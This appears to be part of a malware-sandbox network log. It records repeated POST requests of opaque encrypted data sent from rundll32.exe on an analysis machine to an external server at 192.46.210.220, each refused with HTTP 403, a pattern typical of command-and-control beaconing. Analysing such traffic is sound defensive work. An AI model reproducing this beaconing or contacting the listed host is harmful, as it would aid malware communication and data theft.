                                                                                                      2021-10-28 03:09:38 UTC404OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:39 UTC409INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:39 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      82192.168.2.450186192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:42 UTC409OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:42 UTC409OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:42 UTC419INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:42 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      83192.168.2.450187192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:42 UTC414OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:42 UTC414OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:43 UTC419INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      84192.168.2.450193192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:46 UTC419OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:46 UTC419OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:47 UTC429INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:47 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      85192.168.2.450195192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:47 UTC424OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:47 UTC424OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:48 UTC429INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:47 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      86192.168.2.450201192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:50 UTC429OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:50 UTC429OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:51 UTC434INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:51 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      87192.168.2.450203192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:51 UTC434OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:51 UTC434OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:51 UTC439INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:51 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      88192.168.2.450209192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:54 UTC439OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:54 UTC439OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:54 UTC444INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      89192.168.2.450211192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:55 UTC444OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:55 UTC444OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:55 UTC449INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:55 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      9192.168.2.449818192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:18 UTC44OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:18 UTC44OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:19 UTC49INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:19 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      90192.168.2.450217192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:57 UTC449OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:57 UTC449OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:58 UTC454INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      91192.168.2.450219192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:58 UTC454OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:58 UTC454OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:59 UTC459INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:59 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      92192.168.2.450226192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:10:02 UTC459OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:10:02 UTC459OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:10:03 UTC468INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:10:03 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      93192.168.2.450227192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:10:02 UTC464OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
